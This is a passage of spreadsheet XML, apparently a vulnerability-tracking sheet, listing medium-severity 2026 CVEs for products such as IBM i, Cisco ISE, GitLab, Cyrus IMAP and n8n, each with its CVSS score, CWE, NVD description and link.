      <c r="D1330" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1330" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1330" s="5" t="inlineStr"/>
      <c r="H1330" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1330" s="5" t="inlineStr"/>
      <c r="J1330" s="5" t="inlineStr"/>
      <c r="K1330" s="5" t="inlineStr"/>
      <c r="L1330" s="5" t="inlineStr"/>
      <c r="M1330" s="5" t="inlineStr"/>
      <c r="N1330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1330" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1330" s="5" t="inlineStr"/>
      <c r="Q1330" s="5" t="inlineStr">
        <is>
          <t>CWE-1385</t>
        </is>
      </c>
      <c r="R1330" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to obtain sensitive information due to improper validation of the WebSocket origin.</t>
        </is>
      </c>
      <c r="S1330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18251</t>
        </is>
      </c>
    </row>
    <row r="1331">
      <c r="A1331" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1331" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18515</t>
        </is>
      </c>
      <c r="D1331" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1331" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1331" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1331" s="5" t="inlineStr"/>
      <c r="H1331" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1331" s="5" t="inlineStr"/>
      <c r="J1331" s="5" t="inlineStr"/>
      <c r="K1331" s="5" t="inlineStr"/>
      <c r="L1331" s="5" t="inlineStr"/>
      <c r="M1331" s="5" t="inlineStr"/>
      <c r="N1331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1331" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1331" s="5" t="inlineStr"/>
      <c r="Q1331" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1331" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to place files into the file system with Navigator for i when they should be blocked by Navigator configuration. This could allow attackers to upload files onto the system to places the Navigator support did not intend, but only if the profile could already do that by itself.</t>
        </is>
      </c>
      <c r="S1331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18515</t>
        </is>
      </c>
    </row>
    <row r="1332">
      <c r="A1332" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20285</t>
        </is>
      </c>
      <c r="D1332" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1332" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1332" s="5" t="inlineStr"/>
      <c r="H1332" s="5" t="inlineStr"/>
      <c r="I1332" s="5" t="inlineStr"/>
      <c r="J1332" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1332" s="5" t="inlineStr"/>
      <c r="L1332" s="5" t="inlineStr"/>
      <c r="M1332" s="5" t="inlineStr"/>
      <c r="N1332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1332" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1332" s="5" t="inlineStr"/>
      <c r="Q1332" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R1332" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker to modify parts of the configuration on an affected device.
This vulnerability is due to the lack of server-side validation of&amp;nbsp;Administrator&amp;nbsp;permissions. An attacker could exploit this vulnerability by submitting a crafted HTTP request to an affected system. A successful exploit could allow the attacker to modify descriptions of files on a specific page. To exploit this vulnerability, an attacker would need valid&amp;nbsp;Administrator credentials.</t>
        </is>
      </c>
      <c r="S1332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20285</t>
        </is>
      </c>
    </row>
    <row r="1333">
      <c r="A1333" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20286</t>
        </is>
      </c>
      <c r="D1333" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1333" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1333" s="5" t="inlineStr"/>
      <c r="H1333" s="5" t="inlineStr"/>
      <c r="I1333" s="5" t="inlineStr"/>
      <c r="J1333" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1333" s="5" t="inlineStr"/>
      <c r="L1333" s="5" t="inlineStr"/>
      <c r="M1333" s="5" t="inlineStr"/>
      <c r="N1333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1333" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1333" s="5" t="inlineStr"/>
      <c r="Q1333" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R1333" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco Identify Services Engine (ISE) could allow an authenticated, remote attacker to modify parts of the configuration on an affected device.
This vulnerability is due to the lack of server-side validation of&amp;nbsp;Administrator&amp;nbsp;permissions. An attacker could exploit this vulnerability by submitting a crafted HTTP request to an affected system. A successful exploit could allow the attacker to modify descriptions of files on a specific page. To exploit this vulnerability, an attacker would need valid&amp;nbsp;Administrator credentials.</t>
        </is>
      </c>
      <c r="S1333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20286</t>
        </is>
      </c>
    </row>
    <row r="1334">
      <c r="A1334" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1334" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29810</t>
        </is>
      </c>
      <c r="D1334" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1334" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1334" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1334" s="5" t="inlineStr"/>
      <c r="H1334" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1334" s="5" t="inlineStr"/>
      <c r="J1334" s="5" t="inlineStr"/>
      <c r="K1334" s="5" t="inlineStr"/>
      <c r="L1334" s="5" t="inlineStr"/>
      <c r="M1334" s="5" t="inlineStr"/>
      <c r="N1334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1334" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1334" s="5" t="inlineStr"/>
      <c r="Q1334" s="5" t="inlineStr">
        <is>
          <t>CWE-390</t>
        </is>
      </c>
      <c r="R1334" s="5" t="inlineStr">
        <is>
          <t>CyberPanel before 2.4.4 omits a "return 0" that is required by the business logic.</t>
        </is>
      </c>
      <c r="S1334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29810</t>
        </is>
      </c>
    </row>
    <row r="1335">
      <c r="A1335" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1335" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29812</t>
        </is>
      </c>
      <c r="D1335" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1335" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1335" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1335" s="5" t="inlineStr"/>
      <c r="H1335" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1335" s="5" t="inlineStr"/>
      <c r="J1335" s="5" t="inlineStr"/>
      <c r="K1335" s="5" t="inlineStr"/>
      <c r="L1335" s="5" t="inlineStr"/>
      <c r="M1335" s="5" t="inlineStr"/>
      <c r="N1335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1335" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1335" s="5" t="inlineStr"/>
      <c r="Q1335" s="5" t="inlineStr">
        <is>
          <t>CWE-778</t>
        </is>
      </c>
      <c r="R1335" s="5" t="inlineStr">
        <is>
          <t>CyberPanel before 2.4.4 has no logging for actions that could potentially manipulate the child domains list.</t>
        </is>
      </c>
      <c r="S1335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29812</t>
        </is>
      </c>
    </row>
    <row r="1336">
      <c r="A1336" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1336" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54247</t>
        </is>
      </c>
      <c r="D1336" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1336" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1336" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1336" s="5" t="inlineStr"/>
      <c r="H1336" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1336" s="5" t="inlineStr"/>
      <c r="J1336" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K1336" s="5" t="inlineStr"/>
      <c r="L1336" s="5" t="inlineStr"/>
      <c r="M1336" s="5" t="inlineStr"/>
      <c r="N1336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1336" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1336" s="5" t="inlineStr"/>
      <c r="Q1336" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R1336" s="5" t="inlineStr">
        <is>
          <t>Skipper is an HTTP router and reverse proxy for service composition. Prior to 0.26.22, Handler in dataclients/kubernetes/admission/admission.go passes the body of requests to the Kubernetes admission endpoint at :9443/admission directly to io.ReadAll(r.Body) without a size limit. An attacker with in-cluster network access and a valid Kubernetes client certificate can send a very large body that causes unbounded memory allocation and an out-of-memory termination of the Skipper process. The disruption is limited to Ingress and RouteGroup admission rather than pod creation or unrelated admission controllers, and Kubernetes normally restarts the process. This issue is fixed in version 0.26.22.</t>
        </is>
      </c>
      <c r="S1336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54247</t>
        </is>
      </c>
    </row>
    <row r="1337">
      <c r="A1337" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1337" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57128</t>
        </is>
      </c>
      <c r="D1337" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1337" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1337" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1337" s="5" t="inlineStr"/>
      <c r="H1337" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1337" s="5" t="inlineStr"/>
      <c r="J1337" s="5" t="inlineStr"/>
      <c r="K1337" s="5" t="inlineStr"/>
      <c r="L1337" s="5" t="inlineStr"/>
      <c r="M1337" s="5" t="inlineStr"/>
      <c r="N1337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1337" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1337" s="5" t="inlineStr"/>
      <c r="Q1337" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R1337" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, the SSE server in src/praisonai-agents/praisonaiagents/server/server.py does not consult ServerConfig.auth_token before handling /publish, /events, or /info requests. A network client that can reach the server can broadcast arbitrary events to connected clients and obtain server configuration and client-count information. This issue is fixed in praisonaiagents 1.6.58.</t>
        </is>
      </c>
      <c r="S1337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57128</t>
        </is>
      </c>
    </row>
    <row r="1338">
      <c r="A1338" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1338" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61909</t>
        </is>
      </c>
      <c r="D1338" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1338" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1338" s="5" t="inlineStr"/>
      <c r="H1338" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1338" s="5" t="inlineStr"/>
      <c r="J1338" s="5" t="inlineStr"/>
      <c r="K1338" s="5" t="inlineStr">
        <is>
          <t>cyrus:imap</t>
        </is>
      </c>
      <c r="L1338" s="5" t="inlineStr"/>
      <c r="M1338" s="5" t="inlineStr"/>
      <c r="N1338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1338" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1338" s="5" t="inlineStr"/>
      <c r="Q1338" s="5" t="inlineStr">
        <is>
          <t>CWE-420</t>
        </is>
      </c>
      <c r="R1338" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. CalDAV/CardDAV multiget bypasses a per-href ACL. An authenticated DAV user with some shared access to another user's calendar or address book could read even unshared events or contacts by including the target hrefs in a calendar-multiget or addressbook-multiget REPORT.</t>
        </is>
      </c>
      <c r="S1338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61909</t>
        </is>
      </c>
    </row>
    <row r="1339">
      <c r="A1339" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1339" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61911</t>
        </is>
      </c>
      <c r="D1339" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1339" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1339" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1339" s="5" t="inlineStr"/>
      <c r="H1339" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1339" s="5" t="inlineStr"/>
      <c r="J1339" s="5" t="inlineStr"/>
      <c r="K1339" s="5" t="inlineStr">
        <is>
          <t>cyrus:imap</t>
        </is>
      </c>
      <c r="L1339" s="5" t="inlineStr"/>
      <c r="M1339" s="5" t="inlineStr"/>
      <c r="N1339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1339" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1339" s="5" t="inlineStr"/>
      <c r="Q1339" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R1339" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. There is a Sieve mailbox existence oracle. An authenticated user could install a Sieve script that probed whether another user's private mailbox existed, or read the value of shared mailbox annotations, by observing which fileinto branch fired during LMTP delivery.</t>
        </is>
      </c>
      <c r="S1339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61911</t>
        </is>
      </c>
    </row>
    <row r="1340">
      <c r="A1340" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1340" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73019</t>
        </is>
      </c>
      <c r="D1340" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1340" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1340" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1340" s="5" t="inlineStr"/>
      <c r="H1340" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1340" s="5" t="inlineStr"/>
      <c r="J1340" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1340"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340" s="5" t="inlineStr"/>
      <c r="M1340" s="5" t="inlineStr"/>
      <c r="N1340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1340" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1340" s="5" t="inlineStr"/>
      <c r="Q1340" s="5" t="inlineStr">
        <is>
          <t>CWE-41</t>
        </is>
      </c>
      <c r="R1340" s="5" t="inlineStr">
        <is>
          <t>Improper resolution of path equivalence in Windows URL Moniker allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S1340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73019</t>
        </is>
      </c>
    </row>
    <row r="1341">
      <c r="A1341" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7514</t>
        </is>
      </c>
      <c r="D1341" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1341" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1341" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G1341" s="5" t="inlineStr"/>
      <c r="H1341" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1341" s="5" t="inlineStr"/>
      <c r="J1341" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K1341" s="5" t="inlineStr"/>
      <c r="L1341" s="5" t="inlineStr"/>
      <c r="M1341" s="5" t="inlineStr"/>
      <c r="N1341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1341" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1341" s="5" t="inlineStr"/>
      <c r="Q1341" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1341" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.9 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that an authenticated user with developer-role permissions could substitute package file content and hide packages from their owners due to improper authorization checks in the Generic Package Registry.</t>
        </is>
      </c>
      <c r="S1341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7514</t>
        </is>
      </c>
    </row>
    <row r="1342">
      <c r="A1342" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1342" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75792</t>
        </is>
      </c>
      <c r="D1342" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1342" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1342" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1342" s="5" t="inlineStr"/>
      <c r="H1342" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1342" s="5" t="inlineStr"/>
      <c r="J1342" s="5" t="inlineStr"/>
      <c r="K1342" s="5" t="inlineStr"/>
      <c r="L1342" s="5" t="inlineStr"/>
      <c r="M1342" s="5" t="inlineStr"/>
      <c r="N1342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1342" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1342" s="5" t="inlineStr"/>
      <c r="Q1342" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R1342" s="5" t="inlineStr">
        <is>
          <t>IBM Sterling Secure Proxy 6.2.0.0 through 6.2.1.2 could allow a remote authenticated attacker to view administrative user interface components due to client-side authorization bypass.</t>
        </is>
      </c>
      <c r="S1342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75792</t>
        </is>
      </c>
    </row>
    <row r="1343">
      <c r="A1343" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8030</t>
        </is>
      </c>
      <c r="D1343" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1343" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1343" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G1343" s="5" t="inlineStr"/>
      <c r="H1343" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1343" s="5" t="inlineStr"/>
      <c r="J1343" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K1343" s="5" t="inlineStr"/>
      <c r="L1343" s="5" t="inlineStr"/>
      <c r="M1343" s="5" t="inlineStr"/>
      <c r="N1343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1343" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1343" s="5" t="inlineStr"/>
      <c r="Q1343" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1343" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed an authenticated user to prevent another user from modifying their group settings due to improper validation of group URL slugs during namespace transfers.</t>
        </is>
      </c>
      <c r="S1343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8030</t>
        </is>
      </c>
    </row>
    <row r="1344">
      <c r="A1344" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1344" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84518</t>
        </is>
      </c>
      <c r="D1344" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1344" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1344" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1344" s="5" t="inlineStr"/>
      <c r="H1344" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1344" s="5" t="inlineStr"/>
      <c r="J1344" s="5" t="inlineStr"/>
      <c r="K1344" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:safari</t>
        </is>
      </c>
      <c r="L1344" s="5" t="inlineStr"/>
      <c r="M1344" s="5" t="inlineStr"/>
      <c r="N1344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1344" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1344" s="5" t="inlineStr"/>
      <c r="Q1344" s="5" t="inlineStr">
        <is>
          <t>CWE-642</t>
        </is>
      </c>
      <c r="R1344" s="5" t="inlineStr">
        <is>
          <t>This issue was addressed through improved state management. This issue is fixed in Safari 27, iOS 27 and iPadOS 27, macOS Golden Gate 27. A malicious website may be able to determine what apps a user has installed.</t>
        </is>
      </c>
      <c r="S1344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84518</t>
        </is>
      </c>
    </row>
    <row r="1345">
      <c r="A1345" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1345" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85173</t>
        </is>
      </c>
      <c r="D1345" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1345" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1345" s="5" t="inlineStr"/>
      <c r="H1345" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1345" s="5" t="inlineStr"/>
      <c r="J1345" s="5" t="inlineStr"/>
      <c r="K1345" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L1345" s="5" t="inlineStr"/>
      <c r="M1345" s="5" t="inlineStr"/>
      <c r="N1345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1345" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1345" s="5" t="inlineStr"/>
      <c r="Q1345" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1345" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 2.36.2 contain a missing per-project authorization vulnerability in the Insights API routes that allows authenticated users with insights scopes to access workflow names and execution statistics across projects. Attackers can supply arbitrary projectId parameters to retrieve sensitive project and workflow information from projects they have no membership in.</t>
        </is>
      </c>
      <c r="S1345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85173</t>
        </is>
      </c>
    </row>
    <row r="1346">
      <c r="A1346" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1346" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86348</t>
        </is>
      </c>
      <c r="D1346" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1346" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1346" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G1346" s="5" t="inlineStr"/>
      <c r="H1346" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1346" s="5" t="inlineStr"/>
      <c r="J1346" s="5" t="inlineStr"/>
      <c r="K1346" s="5" t="inlineStr"/>
      <c r="L1346" s="5" t="inlineStr"/>
      <c r="M1346" s="5" t="inlineStr"/>
      <c r="N1346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1346" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
